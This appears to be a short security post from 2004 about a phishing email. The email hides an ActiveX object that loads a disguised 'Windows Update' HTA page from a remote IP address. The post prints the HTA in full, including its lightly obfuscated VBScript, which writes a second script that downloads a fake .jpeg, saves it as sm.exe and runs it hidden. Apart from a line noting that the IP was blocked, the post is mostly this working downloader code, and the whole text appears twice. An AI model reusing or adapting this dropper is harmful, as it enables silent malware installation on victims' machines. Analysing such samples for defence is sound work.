Contains an activex control:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<DIV dir=ltr align=left></DIV>
<DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left>
<HR tabIndex=-1>
<FONT face=Tahoma size=2><B>From:</B> My User
<B>Sent:</B> Thursday,
March 18, 2004 1:43 PM
<B>To:</B> Network Services
<B>Subject:</B> FW:
Site changes
</FONT>
</DIV>
<DIV></DIV>
<DIV><SPAN class=370044119-18032004><FONT face=Arial color=#0000ff size=2>can
someone tell me what this is? I don't know of this address and it seems
like there is some sort of attachment but nothing comes up.</FONT></SPAN></DIV>
<DIV class=OutlookMessageHeader dir=ltr align=left><FONT face=Tahoma
size=2>-----Original Message-----
<B>From:</B> 3Dmy.user@my.company.com
[mailto:3Dmy.user@my.company.com]
<B>Sent:</B> Thursday, March 18, 2004
1:38 PM
<B>To:</B> Lee Dufour
<B>Subject:</B> Site
changes
</FONT></DIV><FONT face=System>
<OBJECT style="DISPLAY: none"
data=http://68.235.202.221:81/802021.php></OBJECT></FONT></BODY></HTML>
That active x opens this .php file from a website.
The .php file is this :
<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "Dim BD" & vbcrlf
TSO.write "Dim xml" & vbcrlf
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.235.202.221:81/eidvtfb.jpeg"", False" & vbcrlf
TSO.write "xml.Send" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "BD = xml.ResponseBody" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Const adTypeBinary = 1" & vbcrlf
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf
TSO.write "A=A=A=A" & vbcrlf
TSO.write "BinaryStream.Open" & vbcrlf
TSO.write "BinaryStream.Write BD" & vbcrlf
TSO.write "b=b=b=b" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false
</SCRIPT>
<script>window.close()</script>
</HEAD>
</HTML>
We blocked this ip: 68.235.202.221 in the pix for now...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<DIV dir=ltr align=left></DIV>
<DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left>
<HR tabIndex=-1>
<FONT face=Tahoma size=2><B>From:</B> My User
<B>Sent:</B> Thursday,
March 18, 2004 1:43 PM
<B>To:</B> Network Services
<B>Subject:</B> FW:
Site changes
</FONT>
</DIV>
<DIV></DIV>
<DIV><SPAN class=370044119-18032004><FONT face=Arial color=#0000ff size=2>can
someone tell me what this is? I don't know of this address and it seems
like there is some sort of attachment but nothing comes up.</FONT></SPAN></DIV>
<DIV class=OutlookMessageHeader dir=ltr align=left><FONT face=Tahoma
size=2>-----Original Message-----
<B>From:</B> 3Dmy.user@my.company.com
[mailto:3Dmy.user@my.company.com]
<B>Sent:</B> Thursday, March 18, 2004
1:38 PM
<B>To:</B> Lee Dufour
<B>Subject:</B> Site
changes
</FONT></DIV><FONT face=System>
<OBJECT style="DISPLAY: none"
data=http://68.235.202.221:81/802021.php></OBJECT></FONT></BODY></HTML>
That active x opens this .php file from a website.
The .php file is this :
<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "Dim BD" & vbcrlf
TSO.write "Dim xml" & vbcrlf
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.235.202.221:81/eidvtfb.jpeg"", False" & vbcrlf
TSO.write "xml.Send" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "BD = xml.ResponseBody" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Const adTypeBinary = 1" & vbcrlf
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf
TSO.write "A=A=A=A" & vbcrlf
TSO.write "BinaryStream.Open" & vbcrlf
TSO.write "BinaryStream.Write BD" & vbcrlf
TSO.write "b=b=b=b" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false
</SCRIPT>
<script>window.close()</script>
</HEAD>
</HTML>
We blocked this ip: 68.235.202.221 in the pix for now...
Facebook
Twitter